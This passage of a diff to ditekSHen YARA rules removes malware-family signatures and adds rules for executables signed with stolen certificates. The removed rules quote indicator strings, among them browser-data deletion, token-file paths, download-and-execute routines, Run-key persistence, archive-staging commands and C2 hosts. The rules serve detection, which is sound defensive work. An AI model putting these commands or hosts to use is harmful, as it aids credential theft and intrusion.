-		$n4 = "&subject=" fullword ascii
-		$n5 = "&Send=" fullword ascii
-		$n6 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword ascii
-		$n7 = "mirabilis.com" ascii
+		thumbprint = "f12dd6e77ffab75870b24dd5bfda5a360843f9e5591e764be9f0a2ac59a710d3"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVER CLOSE s.r.o." and pe.signatures [ i ] . serial == "da:20:76:1a:fb:b0:46:3c:55:b1:ea:88:bb:c7:ec:57" )
 }
-rule DITEKSHEN_MALWARE_Win_Gravityrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C51F4Cf4D82Bc920421E1Ad93E39D490 : FILE
 {
 	meta:
-		description = "Detects GravityRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cb581dd6-15b2-54ae-9f27-30ec21554fb9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6086-L6108"
+		id = "cbb6cb90-b0f0-5271-81ae-8639c28a5df1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8731-L8744"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a6b049dbf21f22f751c15da98536e9ef2a4ced7755ade0cc9904afddef1d3ae6"
+		logic_hash = "b9152998eb3c4ba2b6e7571ed03c63ae1ade2f922df6901f8e46b08f41474f7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/GX/GX-Server.php?VALUE=2&Type=" wide
-		$s2 = "&SIGNATUREHASH=" wide
-		$s3 = "Error => CommonFunctionClass => Upload()" wide
-		$s4 = "/GetActiveDomains.php" wide
-		$s5 = "DetectVM" ascii wide
-		$s6 = "/c {0} > {1}" wide
-		$s7 = "DRIVEUPLOADCOMPLETED => TOTALFILES={0}, FILESUPLOADED={1}" wide
-		$s8 = "Program => RunAFile()" wide
-		$s9 = "DoViaCmd" ascii
-		$s10 = ".msoftupdates.com:" wide
-		$f1 = "<RootJob>b__" ascii
-		$f2 = "<GetFiles>b__" ascii
-		$f3 = "<UpdateServer>b__" ascii
-		$f4 = "<EthernetId>b__" ascii
-		$f5 = "<MatchMacAdd>b__" ascii
+		thumbprint = "d17dc7ef018e13b9a482b60871e25447fb1ae724dfe69b5287dce6b9b78d84a9"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $f* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" )
 }
-rule DITEKSHEN_MALWARE_Win_Fatalrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_69A72F5591Ad78A0825Fbb9402Ab9543 : FILE
 {
 	meta:
-		description = "Detects FatalRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f9d0c5dd-ae69-512d-a260-01b9765e10eb"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6110-L6128"
+		id = "a30ca6aa-3bf4-5fa2-8297-7b983410e5d4"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8746-L8759"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fb7f6822aa4ef98e77670d276d06c9a37718bce38d32ce5b53fe67513b107fbe"
+		logic_hash = "b2a8c08a612f7352a159a9d3f7d9152d9de043db1ec69e4bb2493533453f8f5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "XXAcQbcXXfRSScR" fullword ascii
-		$s1 = "CHROME_NO_DATA" fullword ascii
-		$s2 = "CHROME_UNKNOW" fullword ascii
-		$s3 = "-Thread running..." ascii
-		$s4 = "InetCpl.cpl,ClearMyTracksByProcess" ascii nocase
-		$s5 = "MSAcpi_ThermalZoneTemperature" ascii nocase
-		$s6 = "taskkill /f /im rundll32.exe" fullword ascii nocase
-		$s7 = "del /s /f %appdata%\\Mozilla\\Firefox" ascii nocase
-		$s8 = "\\\\%s\\C$\\" ascii
-		$s9 = "fnGetChromeUserInfo" fullword ascii
-		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" fullword ascii
+		thumbprint = "42a6612f4c652b521435989b5f044403649fef6db4fb476f3c4d981dc2f9bdf8"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" )
 }
-rule DITEKSHEN_MALWARE_Win_Wingo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_8Cece6Df54Cf6Ad63596546D77Ba3581 : FILE
 {
 	meta:
-		description = "Detects malicious Golang executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bc0c84d6-7ea1-5234-89f6-98337900e044"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6130-L6141"
+		id = "c5c19072-5a2f-5851-83bf-25a9e2fd9033"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8761-L8774"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "423b1631ad625fd46a9d10f0ecdf24931cf62a2c1694da3ebdd38daad0a4f724"
+		logic_hash = "1980b3ef7df1bfa43d401fdd8393cb8ffb5c919d558c23314ffb9e823cf9590d"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID:" ascii
-		$s2 = /main\.[a-z]{9}Delete/ fullword ascii
-		$s3 = /main\.[a-z]{9}Update/ fullword ascii
-		$s4 = /main\.[a-z]{9}rundll/ fullword ascii
+		thumbprint = "1a9ff8aba1b24e3bd06442ac6d593ff224b685cba4edef79e740f569ab453161"
+		reason = "Malware"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of them and #s2 > 2 and #s3 > 2 and #s4 > 2 )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" )
 }
-rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Db95B22362D46A73C39E0Ac924883C5B : FILE
 {
 	meta:
-		description = "Detects unknown malicious executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6143-L6154"
+		id = "df60473d-da8a-59c1-84d1-717d52d2411d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8776-L8789"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb"
+		logic_hash = "29015f6e11f2c93cc12e39cf50a1bda3bd4aa0bb7df0d7374223031361067495"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "lbroscfg.dll" wide
-		$s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide
-		$s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii
-		$s4 = "C++\\Browser_noime\\" ascii
+		thumbprint = "751a7e6c4dbe6e7ca633b91515c9f620bff6314ce09969a3af26d18945dc43b5"
+		reason = "Smoke Loader"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" )
 }
-rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : FILE
 {
 	meta:
-		description = "Detects Panda Stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6156-L6172"
+		id = "8b17b23f-3296-55b2-8e7b-40e13a14a610"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8791-L8804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25"
+		logic_hash = "9af0b27e96575298a31b53f6f88cdb20934db75637abdd0acb40bb3c6921542c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\tokens.txt" fullword ascii
-		$s2 = "user.config" fullword ascii
-		$s3 = "Discord\\" ascii
-		$s4 = "%s\\etilqs_" fullword ascii
-		$s5 = "buildSettingGrabber" ascii
-		$s6 = "buildSettingSteam" ascii
-		$s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii
-		$s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii
-		$s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii
+		thumbprint = "e386450257e170981513b7001a82fb029f0931e5c2f11c6d9b86660da0b89a66"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" )
 }
-rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6000F8C02B0A15B1E53B8399845Faddf : FILE
 {
 	meta:
-		description = "Detects Gelsemine"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6174-L6194"
+		id = "6d4224bd-1522-5b0f-b39e-1ba4ec0f1a63"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8806-L8819"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068"
+		logic_hash = "a8687b2aa02909af5fc7c706f31c419c4af48225abe7415bf262de57bb85258f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide
-		$s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide
-		$s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide
-		$s4 = "A simple example would be this)which is to be understood as one of these" fullword wide
-		$s5 = "bala bala bala" fullword wide
-		$s6 = "echo FOO" fullword wide
-		$s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii
-		$o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
-		$o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
-		$o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff }
-		$o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 }
-		$o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d }
-		$o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 }
+		thumbprint = "6f18caa7cd75582d3a311dcc2dadec2ed32e15261c1dc5c9471e213d28367362"
+		reason = "Amadey"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( all of ( $o* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" )
 }
-rule DITEKSHEN_MALWARE_Win_Gelsevirine : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F6Ad45188E5566Aa317Be23B4B8B2C2F : FILE
 {
 	meta:
-		description = "Detects Gelsevirine"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "70f0ed08-4e07-5ab3-968e-95059d20a8e9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6224-L6254"
+		id = "d4afb6ed-1cfd-5c49-8959-0cf136d0e9f0"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8821-L8834"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "60d41d6d789f1cd2a7040d6535f13c69ea58a489035838f047b886e8f1f37f63"
+		logic_hash = "7afafea141727e2ed4c1975a18aa77b282c7d9ece5729dbd96cbb49cc2b393f1"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = /64loadpath(xp|sv|7)/ fullword wide
-		$s2 = "{\"Actions\":[]}" fullword wide
-		$s3 = "PlatformsChunk" fullword wide
-		$s4 = "CurrentPluginCategory" fullword wide
-		$s5 = "CurrentOperationPlatform" fullword wide
-		$s6 = "PersistencePlugins" fullword wide
-		$s7 = "memory_library_file" fullword wide
-		$s8 = "LoadPluginBP" fullword ascii
-		$s9 = "GetOperationBasicInformation" fullword ascii
-		$s10 = "commonappdata/Intel/Runtime" wide
-		$s11 = "cfsst x64" fullword wide
-		$s12 = "ForkOperation" fullword ascii
-		$c1 = "domain.dns04.com:8080;domain.dns04.com:443;acro.ns1.name:80;acro.ns1.name:1863;" wide
-		$c2 = "<base64 content=\"" fullword ascii
-		$c3 = "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" fullword ascii
-		$m1 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
-		$m2 = "46EBBDC3-EEDC-42D4-BA1D-D454DFCE8E42" ascii wide
-		$m3 = "135054C6-8036-42C7-A97C-31F37D7728BD" ascii wide
-		$m4 = "DC7FDDF7-B2F1-4B99-BE6A-AA683FF11CE6" ascii wide
-		$m5 = "131C8113-E083-4C7F-BEAF-82D73B01F2C5" ascii wide
-		$m6 = "4CCF506D-2F61-4C3A-B9C6-9FA47D43A3FC" ascii wide
-		$m7 = "B2DC745A-66AE-4A19-B11C-AD74D46B7EE0" ascii wide
-		$m8 = "6BDA7FEF-232F-4EA6-8FC8-24F58CD7B366" ascii wide
+		thumbprint = "ae7db8b64e8abd9d36876f049b9770d90c0868d7fe1a2d37cf327df69fa2dbfe"
+		reason = "Numando"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 2 of ( $c* ) and 4 of ( $s* ) ) or ( 5 of ( $m* ) and ( 1 of ( $c* ) or 3 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gary Kramlich" and pe.signatures [ i ] . serial == "f6:ad:45:18:8e:55:66:aa:31:7b:e2:3b:4b:8b:2c:2f" )
 }
-rule DITEKSHEN_MALWARE_Win_Ipsechelper : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_74Fc9257Bc86F8C618501695Ad4B1606 : FILE
 {
 	meta:
-		description = "Detects IPsecHelper backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f848ac2a-95ad-596a-b193-5cfb424e33a2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6256-L6279"
+		id = "c0ed5369-ca51-50b8-941a-580262b4f644"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8836-L8849"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be0ecf8a97d289b15b902420d769925b7b22ab835bd7d10d10b059119f41e540"
+		logic_hash = "d6a9956d8bcc717186c205d07b94df1df4818bee58f98bdc128ec569331ab5e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "rundll32.exe advapi32.dll,ProcessIdleTasks" wide
-		$s2 = "CommandExecute" fullword ascii
-		$s3 = "DownloadExecuteUrl" fullword ascii
-		$s4 = "DownloadExecuteFile" fullword ascii
-		$s5 = "CmdExecute" fullword ascii
-		$s6 = "ExecuteProcessWithResult" fullword ascii
-		$s7 = "IsFirstInstance ==> checked" fullword wide
-		$s8 = "del \"%PROG%%SERVICENAME%\".*" fullword wide
-		$s9 = ".CreateConfig" wide
-		$s10 = ".SelfDelete" wide
-		$c1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; EmbeddedWB 14.52 from: http://www.google.com/ EmbeddedWB 14.52;" wide
-		$c2 = "boot.php" wide
-		$c3 = "lastupdate.php" wide
-		$c4 = "main.php" wide
-		$c5 = "InternetNeeded" wide
-		$c6 = "DeviceIdSalt" wide
+		thumbprint = "8ebbb2ab8f2e1366d0137e5026e07fde229f45f39d043c7ad36091b8eb2a923e"
+		reason = "ParallaxRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $c* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "169Teaco Limited" and pe.signatures [ i ] . serial == "74:fc:92:57:bc:86:f8:c6:18:50:16:95:ad:4b:16:06" )
 }
-rule DITEKSHEN_MALWARE_Win_Apostle : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3B0914E2982Be8980Aa23F49848555E5 : FILE
 {
 	meta:
-		description = "Detects Apsotle"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6e6d2ef0-b709-5915-b644-db86d9d3f26a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6281-L6295"
+		id = "bda3e8b2-5d1b-5898-a4c3-318fc88506b8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8851-L8864"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aa5a522383cbb7e2fdb90f4c4395c7f92f546aa1dbda8f44090225861f011630"
+		logic_hash = "b1ced5176720e0a3bd475172a167675de8211987fbae11b93eab1fba6b3629f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "bytesToBeEncrypted" fullword ascii
-		$s2 = "SelfDelete" fullword ascii
-		$s3 = "ReadMeFileName" ascii
-		$s4 = "DesktopFileName" ascii
-		$s5 = "SetWallpaper" fullword ascii
-		$s6 = "get_EncryptionKey" fullword ascii
-		$s7 = "disall" fullword ascii
+		thumbprint = "254e59ea93fa5f2a6af44f9631660f7b6cca4b4c9f97046405bcfed5589a32fa"
+		reason = "ParallaxRAT"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" )
 }
-rule DITEKSHEN_MALWARE_Win_DEADWOOD : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_029Bf7E1Cb09Fe277564Bd27C267De5A : FILE
 {
 	meta:
-		description = "Detects DEADWOOD"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a75e30d8-75ec-5eaf-94f5-5556a3b947ae"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6297-L6313"
+		id = "19d1012f-9a9e-5d84-885c-2571bfd1876c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8866-L8879"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf53abc801971b294e0a23bb0162ceb7c56a563a16e73c317f6a890ba545b67d"
+		logic_hash = "a8c817dc99d55dcbea31334cc10b6a7ae3b5cf831e28cb2daf9d4b06fb4bec60"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Service Start Work !!!!" fullword ascii
-		$s2 = "Error GetTokenInformation : " fullword ascii
-		$s3 = "\\Windows\\System32\\net.exe" fullword wide
-		$s4 = "App Start Work !!!!" fullword ascii
-		$s5 = "vmmouse" fullword wide
-		$s6 = "CDPUserSvc_" wide
-		$s7 = "WpnUserService_" wide
-		$s8 = "User is :" wide
-		$s9 = "\\params" fullword ascii
+		thumbprint = "2b18684a4b1348bf78f6d58d3397ee5ca80610d1c39b243c844e08f1c1e0b4bf"
+		reason = "Lazarus"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" )
 }
-rule DITEKSHEN_MALWARE_Win_Turian : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_984E84Cfe362E278F558E2C70Aaafac2 : FILE
 {
 	meta:
-		description = "Hunt for Turian / Qurian"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "eafa9442-a01b-5044-bc47-634297a3efcc"
-		date = "2020-11-06"
-		modified = "2024-11-01"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6315-L6343"
+		id = "3d071d42-b96a-5491-96f5-4605b6b5584e"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8881-L8894"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87f4263381c5e93fcba0873aa3bb9a1db4b21225141cd7f06be30f5777a47806"
+		logic_hash = "a3a42c5b6ad094deb2a9f33789b6f7e52f76e65b2336372341f16389cef40f88"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "d1218ab9d608ee0212e880204e4d7d75f29f03b77248bca7648d111d67405759"
-		cnc_domain = "windowsupdate[.]dyndns[.]info"
-		cnc_ip = "58[.]158[.]177[.]102"
-
-	strings:
-		$s1 = "%s a -m5 -hp1qaz@WSX3edc -r %s %s\\*.*" ascii wide
-		$s2 = "%s a -m5 -hpMyHost-1 -r %s %s\\*.*" ascii wide
-		$s3 = "%s a -m5 -hp1qaz@WSX3edc -ta%04d%02d%02d000000 -r %s c:" ascii wide
-		$s4 = "%s a -m5 -hpMyHost-1 -ta%04d%02d%02d000000 -r %s c:"
-		$s5 = "cmd /c dir /s /O:D %s>>\"%s\"" ascii wide
-		$s6 = "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v %s /t REG_SZ /d \"%s\" /f" fullword ascii
-		$s7 = "Not Connect!" fullword ascii
-		$p1 = "RECYCLER\\S-1-3-33-854245398-2067806209-0000980848-2003\\" ascii wide
-		$p2 = "%sRECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
-		$p3 = "\\RECYCLER.{S-1-3-33-854245398-2067806209-0000980848-2003}\\" ascii wide
-		$p4 = "\\RECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
-		$p5 = "%sRECYCLER.{645ff040-5081-101b-9f08-00aa002f954e}\\" ascii wide
-		$c1 = "CONNECT %s:%u HTTP/1." ascii wide
-		$c2 = "User-Agent: Mozilla/4.0" ascii wide
-		$m1 = "winsupdatetw" fullword ascii wide
-		$m2 = "clientsix" fullword ascii wide
-		$m3 = "updatethres" fullword ascii wide
-		$m4 = "uwatchdaemon" fullword ascii wide
+		thumbprint = "0b2d1dad72c69644f80ad871743878b5eb1e45e451d0d2c9579bdf81384f8727"
+		reason = "Quakbot"
+		importance = 20
 
 	condition:
